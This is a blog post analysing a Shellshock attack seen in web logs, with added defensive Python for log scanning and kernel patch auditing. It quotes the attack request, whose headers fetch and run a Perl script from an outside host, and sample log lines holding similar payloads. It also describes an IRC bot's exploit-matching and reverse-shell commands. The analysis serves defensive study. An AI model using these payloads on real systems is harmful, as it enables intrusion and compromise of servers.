Attack of the Day

Shh.. Be very, very Quiet. We’re Hunting Rabbits

** Standard Warnings Apply **
Let me help you understand..

When this rolled in today I was thinking, “Oh, another shellshock attempt.  I wonder which code base they’ll be attempting to deliver today?”  I wouldn’t even have posted this were it not for the payload contained at the other end of this URL.

GET / HTTP/1.0
Host: www.planetspork.com
Accept-Encoding: identity
Referer: () { ignored;};/bin/bash -c 'wget http://www.ossrc.com/phpfmg/leg -O /tmp/.go;chmod +x /tmp/.go;perl /tmp/.go'
Cookie: () { ignored;};/bin/bash -c 'wget http://www.ossrc.com/phpfmg/leg -O /tmp/.go;chmod +x /tmp/.go;perl /tmp/.go'
Content-type: application/x-www-form-urlencoded
X-Forwarded-For: 173.15.11.25
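Before getting to what the URL serves, here is how a request like the one above shows up in ordinary web logs. This is an added example, not code from the post and not the bot: a small Python scanner for Apache combined-format access logs that looks for the `() {` function-definition prefix in the request line, Referer and User-Agent fields, and pulls out the download URL and drop path from any payload it finds so they can be triaged as indicators. The log lines are constructed for the example; the Referer payload on the first line is the one from the request above, while the client IPs, timestamps and the third line's payload are made up.

```python
import re

# Apache "combined" log format: client, ident, user, [time], "request", status,
# bytes, "referer", "user-agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Shellshock-style payload: an exported function definition "() { ...};" followed
# by whatever a vulnerable bash would then execute.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# What the payload fetches and where it drops it, for IoC triage.
DOWNLOAD_RE = re.compile(r'''\b(?:wget|curl)\b[^;'"]*?(https?://\S+?)(?:[\s;']|$)''')
DROP_PATH_RE = re.compile(r"-[oO]\s+(/\S+?)(?:[;'\s]|$)")

# Constructed sample log lines. Line 1 carries the Referer payload quoted in the
# post; client IPs, timestamps and the third line's payload are made up.
SAMPLE_LOG = """\
198.51.100.23 - - [01/Oct/2014:10:12:03 +0000] "GET / HTTP/1.0" 200 512 "() { ignored;};/bin/bash -c 'wget http://www.ossrc.com/phpfmg/leg -O /tmp/.go;chmod +x /tmp/.go;perl /tmp/.go'" "-"
203.0.113.7 - - [01/Oct/2014:10:12:09 +0000] "GET /index.html HTTP/1.1" 200 2048 "http://example.com/" "Mozilla/5.0"
198.51.100.4 - - [01/Oct/2014:10:13:44 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 209 "-" "() { :;}; /bin/bash -c 'curl http://203.0.113.9/x -o /tmp/x'"
"""


def scan_log(text):
    """Return one finding per log field that carries a shellshock-style payload."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; a real scanner would count these
        for field in ("request", "referer", "ua"):
            value = m.group(field)
            if not SHELLSHOCK_RE.search(value):
                continue
            findings.append({
                "line": lineno,
                "src_ip": m.group("ip"),
                "field": field,
                "download_urls": DOWNLOAD_RE.findall(value),
                "drop_paths": DROP_PATH_RE.findall(value),
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

One caveat worth knowing: the combined log format records Referer and User-Agent but not Cookie, so the Cookie copy of this payload never reaches the access log unless you log that header explicitly or inspect requests at the proxy or WAF. Matching on the `() {` prefix rather than on the specific wget command also catches the next variant that swaps in curl or a different host.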

Once opened, I see this:

#!/usr/bin/perl
###########################################################
#-PRIVATE-SHIT--PRIVATE-SHIT--PRIVATE-SHIT--PRIVATE-SHIT--#
###########################################################
# Legend Bot [2011] DO NOT FUCKIN SHARE! #
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
# Commands: #
# !legend @system #
# !legend @rootable #
# !legend @cleanlogs #
# !legend @socks5 #
# !legend @nmap #
# !legend @back #
# !legend @sqlflood

First off, such language. A wag of the finger at you, sir.  Secondly, if you want to keep this private you should build in a mechanism to stop random people from downloading it at will.  I mean, really.

I half expected to be able to just google “Legend Bot 2011” and have some prewritten material to reference..  There were a few things, nothing really detailing the bot itself. Mostly I found videos/forums and other crap about how to use a bot in some “League of Legends” video game. Not really what I’m looking for.

Looking through this bot, most of it is IRC handlers and the like.  One command of particular interest was named @rootable.  Very simple, really, but it looked at the currently running kernel version (uname -r) and compared it to a predefined list of known exploits.  Anything that came back as exploitable would be sent via IRC message to the bot owner.  This accomplished two things:  First, it’s a very quiet way to understand if a system is vulnerable.  No poking or testing, just comparing it to a known list.  Second, it’s very efficient.  Bot tells operator what to attempt. Operator can attempt the things that are highly likely to succeed.  That part may have been scripted, also..
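The @rootable check is a comparison, not a probe, and the same comparison is just as useful run the other way round as a patch audit. As an added example (my code, not the bot's and not from the post), here is a patch-status check for `uname -r` output: it splits the string into the upstream version, the distro build revision and the flavor, then compares the revision against a table of the lowest revision known to carry the fix. The MIN_PATCHED table is a constructed placeholder with made-up thresholds, not real advisory data; a working version would be filled from your distribution's security advisories.

```python
import re
from typing import NamedTuple, Tuple


class KernelVersion(NamedTuple):
    upstream: Tuple[int, ...]   # e.g. (3, 13, 0)
    revision: Tuple[int, ...]   # distro build revision, e.g. (24,) or (431, 20, 3)
    flavor: str                 # e.g. "generic", "el6", "amd64"


# uname -r shapes handled: "3.13.0-24-generic", "2.6.32-431.20.3.el6.x86_64",
# "3.2.0-4-amd64", and a bare upstream "4.4.0".
UNAME_RE = re.compile(
    r"^(?P<up>\d+(?:\.\d+)*)(?:-(?P<rev>\d+(?:\.\d+)*))?(?:[-.](?P<rest>.*))?$"
)


def parse_uname(uname_r):
    """Split a uname -r string into upstream version, distro revision and flavor."""
    m = UNAME_RE.match(uname_r.strip())
    if not m:
        raise ValueError("unrecognised uname -r: %r" % uname_r)
    upstream = tuple(int(x) for x in m.group("up").split("."))
    rev = m.group("rev")
    revision = tuple(int(x) for x in rev.split(".")) if rev else ()
    rest = m.group("rest") or ""
    flavor = re.split(r"[-.]", rest)[0] if rest else ""
    return KernelVersion(upstream, revision, flavor)


# Constructed placeholder table, NOT real advisory data: for each (upstream, flavor)
# the lowest distro revision that carries the fix. Distro kernels backport fixes,
# so the revision, not the upstream number, decides patched or not.
MIN_PATCHED = {
    ("3.13.0", "generic"): (30,),
    ("2.6.32", "el6"): (431, 20, 3),
    ("3.2.0", "amd64"): (4,),
}


def audit(uname_r, table=MIN_PATCHED):
    """Classify a running kernel as patched, needs-update, or unknown to the table."""
    kv = parse_uname(uname_r)
    key = (".".join(str(n) for n in kv.upstream), kv.flavor)
    if key not in table:
        return "unknown"
    return "patched" if kv.revision >= table[key] else "needs-update"


if __name__ == "__main__":
    import subprocess
    running = subprocess.check_output(["uname", "-r"]).decode()
    print(running.strip(), "->", audit(running))
```

The point of keeping the revision separate is the one the bot gets wrong: a list keyed on the upstream number alone calls every backported distro kernel "rootable" when many are already fixed, and a defender who audits by the same leading number makes the mirror-image mistake. "unknown" is a result worth acting on too; it means a kernel your table does not cover is in production.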

The other kind of cool thing in this was a command called “@back”.  This creates a connection to a remote machine attached to a shell on the victim.  Assuming a guy might be able to chain these commands together, one could quite easily have a whole host of machines start showing up in an IRC channel saying, “Found another one.  Here’s root.  I’ll see what else I can find.  Peace.”
